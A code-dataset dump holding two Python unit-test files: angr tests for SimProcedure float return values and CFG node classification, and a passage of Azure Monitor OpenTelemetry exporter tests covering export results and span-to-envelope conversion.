hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f47ae539f11c1c6de28602ec2f190b5bbf778e70 | 3,701 | py | Python | tests/test_sim_procedure.py | hwu71/angr | cd306a128e36a570452174d943ac14934680dae2 | [
"BSD-2-Clause"
] | null | null | null | tests/test_sim_procedure.py | hwu71/angr | cd306a128e36a570452174d943ac14934680dae2 | [
"BSD-2-Clause"
] | null | null | null | tests/test_sim_procedure.py | hwu71/angr | cd306a128e36a570452174d943ac14934680dae2 | [
"BSD-2-Clause"
] | null | null | null | import os
import angr
import claripy
import nose
from angr.codenode import BlockNode, HookNode, SyscallNode
BIN_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'binaries')
def test_ret_float():
    """A SimProcedure returning a Python float must place it in the
    architecture's floating-point return location (st0 on i386, xmm0 on
    amd64), for both ``float`` and ``double`` prototypes.
    """
    class F1(angr.SimProcedure):
        def run(self):
            return 12.5

    # i386: FP return values travel on the x87 stack (st0).
    p = angr.load_shellcode(b'X', arch='i386')
    p.hook(0x1000, F1(prototype='float (x)();'))
    p.hook(0x2000, F1(prototype='double (x)();'))

    s = p.factory.call_state(addr=0x1000, ret_addr=0, prototype='float(x)()')
    succ = s.step()
    nose.tools.assert_equal(len(succ.successors), 1)
    s2 = succ.flat_successors[0]
    nose.tools.assert_false(s2.regs.st0.symbolic)
    nose.tools.assert_equal(s2.solver.eval(s2.regs.st0.raw_to_fp()), 12.5)

    s = p.factory.call_state(addr=0x2000, ret_addr=0, prototype='double(x)()')
    succ = s.step()
    nose.tools.assert_equal(len(succ.successors), 1)
    s2 = succ.flat_successors[0]
    nose.tools.assert_false(s2.regs.st0.symbolic)
    nose.tools.assert_equal(s2.solver.eval(s2.regs.st0.raw_to_fp()), 12.5)

    # amd64: FP return values travel in xmm0 (4 bytes for float, 8 for double).
    p = angr.load_shellcode(b'X', arch='amd64')
    p.hook(0x1000, F1(prototype='float (x)();'))
    p.hook(0x2000, F1(prototype='double (x)();'))

    s = p.factory.call_state(addr=0x1000, ret_addr=0, prototype='float(x)()')
    succ = s.step()
    nose.tools.assert_equal(len(succ.successors), 1)
    s2 = succ.flat_successors[0]
    res = s2.registers.load('xmm0', 4).raw_to_fp()
    nose.tools.assert_false(res.symbolic)
    nose.tools.assert_equal(s2.solver.eval(res), 12.5)

    s = p.factory.call_state(addr=0x2000, ret_addr=0, prototype='double(x)()')
    succ = s.step()
    nose.tools.assert_equal(len(succ.successors), 1)
    s2 = succ.flat_successors[0]
    res = s2.registers.load('xmm0', 8).raw_to_fp()
    nose.tools.assert_false(res.symbolic)
    nose.tools.assert_equal(s2.solver.eval(res), 12.5)
def test_syscall_and_simprocedure():
    """CFG nodes for syscalls, plain functions, and hooked functions must
    report the correct simprocedure/syscall/hook flags and snippet types.
    """
    bin_path = os.path.join(BIN_PATH, 'tests', 'cgc', 'CADET_00002')
    proj = angr.Project(bin_path, auto_load_libs=False)
    cfg = proj.analyses.CFGFast(normalize=True)

    # check syscall
    node = cfg.get_any_node(proj.loader.kernel_object.mapped_base + 1)
    func = proj.kb.functions[node.addr]
    nose.tools.assert_true(node.is_simprocedure)
    nose.tools.assert_true(node.is_syscall)
    nose.tools.assert_false(node.to_codenode().is_hook)
    nose.tools.assert_false(proj.is_hooked(node.addr))
    nose.tools.assert_true(func.is_syscall)
    nose.tools.assert_true(func.is_simprocedure)
    nose.tools.assert_equal(type(proj.factory.snippet(node.addr)), SyscallNode)

    # check normal functions
    node = cfg.get_any_node(0x80480a0)
    func = proj.kb.functions[node.addr]
    nose.tools.assert_false(node.is_simprocedure)
    nose.tools.assert_false(node.is_syscall)
    nose.tools.assert_false(proj.is_hooked(node.addr))
    nose.tools.assert_false(func.is_syscall)
    nose.tools.assert_false(func.is_simprocedure)
    nose.tools.assert_equal(type(proj.factory.snippet(node.addr)), BlockNode)

    # check hooked functions
    proj.hook(0x80480a0, angr.SIM_PROCEDURES['libc']['puts']())
    cfg = proj.analyses.CFGFast(normalize=True)  # rebuild cfg to get updated nodes
    node = cfg.get_any_node(0x80480a0)
    func = proj.kb.functions[node.addr]
    nose.tools.assert_true(node.is_simprocedure)
    nose.tools.assert_false(node.is_syscall)
    nose.tools.assert_true(proj.is_hooked(node.addr))
    nose.tools.assert_false(func.is_syscall)
    nose.tools.assert_true(func.is_simprocedure)
    nose.tools.assert_equal(type(proj.factory.snippet(node.addr)), HookNode)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    test_ret_float()
    test_syscall_and_simprocedure()
| 37.383838 | 92 | 0.708187 | 561 | 3,701 | 4.479501 | 0.204991 | 0.111023 | 0.185038 | 0.103462 | 0.788699 | 0.766813 | 0.730203 | 0.717071 | 0.717071 | 0.696777 | 0 | 0.039548 | 0.139152 | 3,701 | 98 | 93 | 37.765306 | 0.749215 | 0.023777 | 0 | 0.592105 | 0 | 0 | 0.043792 | 0 | 0 | 0 | 0.020787 | 0 | 0.407895 | 1 | 0.039474 | false | 0 | 0.065789 | 0.013158 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bea8033ccbd7afc2e3bb002cd3fdf4f317067cdf | 35,327 | py | Python | azure_monitor/tests/trace/test_trace.py | yao-cqc/opentelemetry-azure-monitor-python | ecd0cd1d323a510be32cf0b1213e82e6d01e74e4 | [
"MIT"
] | 13 | 2020-04-03T17:17:45.000Z | 2021-06-08T15:23:03.000Z | azure_monitor/tests/trace/test_trace.py | yao-cqc/opentelemetry-azure-monitor-python | ecd0cd1d323a510be32cf0b1213e82e6d01e74e4 | [
"MIT"
] | 72 | 2020-03-24T10:42:06.000Z | 2021-01-28T23:39:42.000Z | azure_monitor/tests/trace/test_trace.py | microsoft/azure-monitor-opentelemetry-exporters-python | 3bd8b514ebef803ae622e308f867799cfab9dc5c | [
"MIT"
] | 11 | 2020-04-27T20:01:31.000Z | 2021-11-02T14:54:14.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import json
import os
import shutil
import unittest
from unittest import mock
# pylint: disable=import-error
from opentelemetry.sdk.trace import Span
from opentelemetry.sdk.trace.export import SpanExportResult
from opentelemetry.trace import Link, SpanContext, SpanKind
from opentelemetry.trace.status import Status, StatusCanonicalCode
from azure_monitor.export import ExportResult
from azure_monitor.export.trace import (
AzureMonitorSpanExporter,
indicate_processed_by_metric_extractors,
)
from azure_monitor.options import ExporterOptions
TEST_FOLDER = os.path.abspath(".test")
STORAGE_PATH = os.path.join(TEST_FOLDER)
# pylint: disable=invalid-name
def setUpModule():
    """Create the scratch folder used for exporter storage by every test."""
    os.makedirs(TEST_FOLDER)
# pylint: disable=invalid-name
def tearDownModule():
    """Remove the scratch folder (and everything in it) after all tests run."""
    shutil.rmtree(TEST_FOLDER)
def throw(exc_type, *args, **kwargs):
    """Return a callable that ignores its own arguments and raises
    ``exc_type(*args, **kwargs)`` — handy as a ``mock.patch`` side effect.
    """
    def func(*_args, **_kwargs):
        raise exc_type(*args, **kwargs)
    return func
# pylint: disable=import-error
# pylint: disable=protected-access
# pylint: disable=too-many-lines
class TestAzureExporter(unittest.TestCase):
@classmethod
def setUpClass(cls):
os.environ.clear()
os.environ[
"APPINSIGHTS_INSTRUMENTATIONKEY"
] = "1234abcd-5678-4efa-8abc-1234567890ab"
cls._exporter = AzureMonitorSpanExporter(storage_path=STORAGE_PATH)
def setUp(self):
for filename in os.listdir(STORAGE_PATH):
file_path = os.path.join(STORAGE_PATH, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except OSError as e:
print("Failed to delete %s. Reason: %s" % (file_path, e))
def test_constructor(self):
"""Test the constructor."""
exporter = AzureMonitorSpanExporter(
instrumentation_key="4321abcd-5678-4efa-8abc-1234567890ab",
storage_path=os.path.join(TEST_FOLDER, self.id()),
storage_max_size=50,
storage_maintenance_period=100,
storage_retention_period=200,
proxies={"asd": "123"},
timeout=5.0,
)
self.assertIsInstance(exporter.options, ExporterOptions)
self.assertEqual(
exporter.options.instrumentation_key,
"4321abcd-5678-4efa-8abc-1234567890ab",
)
self.assertEqual(
exporter.storage.path, os.path.join(TEST_FOLDER, self.id())
)
self.assertEqual(exporter.storage.max_size, 50)
self.assertEqual(exporter.storage.maintenance_period, 100)
self.assertEqual(exporter.storage.retention_period, 200)
self.assertEqual(exporter.options.proxies, {"asd": "123"})
self.assertEqual(exporter.options.timeout, 5.0)
self.assertEqual(
exporter._telemetry_processors[0],
indicate_processed_by_metric_extractors,
)
def test_export_empty(self):
exporter = self._exporter
exporter.export([])
self.assertEqual(len(os.listdir(exporter.storage.path)), 0)
def test_export_failure(self):
exporter = self._exporter
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit"
) as transmit: # noqa: E501
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
transmit.return_value = ExportResult.FAILED_RETRYABLE
exporter.export([test_span])
self.assertEqual(len(os.listdir(exporter.storage.path)), 1)
self.assertIsNone(exporter.storage.get())
def test_export_success(self):
exporter = self._exporter
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit"
) as transmit: # noqa: E501
transmit.return_value = ExportResult.SUCCESS
storage_mock = mock.Mock()
exporter._transmit_from_storage = storage_mock
exporter.export([test_span])
self.assertEqual(len(exporter._telemetry_processors), 1)
self.assertEqual(storage_mock.call_count, 1)
self.assertEqual(len(os.listdir(exporter.storage.path)), 0)
@mock.patch("azure_monitor.export.trace.logger")
def test_export_exception(self, logger_mock):
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
exporter = self._exporter
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit",
throw(Exception),
): # noqa: E501
result = exporter.export([test_span])
self.assertEqual(result, SpanExportResult.FAILURE)
self.assertEqual(logger_mock.exception.called, True)
def test_export_not_retryable(self):
exporter = self._exporter
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit"
) as transmit: # noqa: E501
transmit.return_value = ExportResult.FAILED_NOT_RETRYABLE
result = exporter.export([test_span])
self.assertEqual(result, SpanExportResult.FAILURE)
def test_indicate_processed_by_metric_extractors(self):
envelope = mock.Mock()
envelope.data.base_type = "RemoteDependencyData"
envelope.data.base_data.properties = {}
indicate_processed_by_metric_extractors(envelope)
self.assertEqual(
envelope.data.base_data.properties[
"_MS.ProcessedByMetricExtractors"
],
"(Name:'Dependencies',Ver:'1.1')",
)
envelope.data.base_type = "RequestData"
indicate_processed_by_metric_extractors(envelope)
self.assertEqual(
envelope.data.base_data.properties[
"_MS.ProcessedByMetricExtractors"
],
"(Name:'Requests',Ver:'1.1')",
)
def test_span_to_envelope_none(self):
exporter = self._exporter
self.assertIsNone(exporter._span_to_envelope(None))
# pylint: disable=too-many-statements
def test_span_to_envelope(self):
exporter = AzureMonitorSpanExporter(
instrumentation_key="12345678-1234-5678-abcd-12345678abcd",
storage_path=os.path.join(TEST_FOLDER, self.id()),
)
parent_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
start_time = 1575494316027613500
end_time = start_time + 1001000000
# SpanKind.CLIENT HTTP
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "GET//wiki/Rabbit")
self.assertEqual(
envelope.data.base_data.data,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_data.target, "www.wikipedia.org")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.result_code, "200")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.type, "HTTP")
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# SpanKind.CLIENT unknown type
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "test")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.type, None)
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# SpanKind.CLIENT missing method
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "test")
self.assertEqual(
envelope.data.base_data.data,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_data.target, "www.wikipedia.org")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.result_code, "200")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.type, "HTTP")
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# SpanKind.SERVER HTTP - 200 request
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.path": "/wiki/Rabbit",
"http.route": "/wiki/Rabbit",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.Request"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(
envelope.tags["ai.operation.name"], "GET /wiki/Rabbit"
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.response_code, "200")
self.assertEqual(envelope.data.base_data.name, "GET /wiki/Rabbit")
self.assertEqual(envelope.data.base_data.success, True)
self.assertEqual(
envelope.data.base_data.url,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_type, "RequestData")
# SpanKind.SERVER HTTP - Failed request
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.path": "/wiki/Rabbit",
"http.route": "/wiki/Rabbit",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.Request"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(
envelope.tags["ai.operation.name"], "GET /wiki/Rabbit"
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.response_code, "400")
self.assertEqual(envelope.data.base_data.name, "GET /wiki/Rabbit")
self.assertEqual(envelope.data.base_data.success, False)
self.assertEqual(
envelope.data.base_data.url,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_type, "RequestData")
# SpanKind.SERVER unknown type
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.path": "/wiki/Rabbit",
"http.route": "/wiki/Rabbit",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.Request"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_type, "RequestData")
# SpanKind.INTERNAL
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=None,
sampler=None,
trace_config=None,
resource=None,
attributes={"key1": "value1"},
events=None,
links=[],
kind=SpanKind.INTERNAL,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertRaises(
KeyError, lambda: envelope.tags["ai.operation.parentId"]
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "test")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.type, "InProc")
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# Attributes
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
"test": "asd",
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(len(envelope.data.base_data.properties), 2)
self.assertEqual(
envelope.data.base_data.properties["component"], "http"
)
self.assertEqual(envelope.data.base_data.properties["test"], "asd")
# Links
links = []
links.append(
Link(
context=SpanContext(
trace_id=36873507687745823477771305566750195432,
span_id=12030755672171557338,
is_remote=False,
)
)
)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=links,
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(len(envelope.data.base_data.properties), 2)
json_dict = json.loads(
envelope.data.base_data.properties["_MS.links"]
)[0]
self.assertEqual(json_dict["id"], "a6f5d48acb4d31da")
# Status
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 500,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.response_code, "500")
self.assertFalse(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 500,
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.result_code, "500")
self.assertFalse(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.response_code, "0")
self.assertTrue(envelope.data.base_data.success)
span = Span(
name="test",
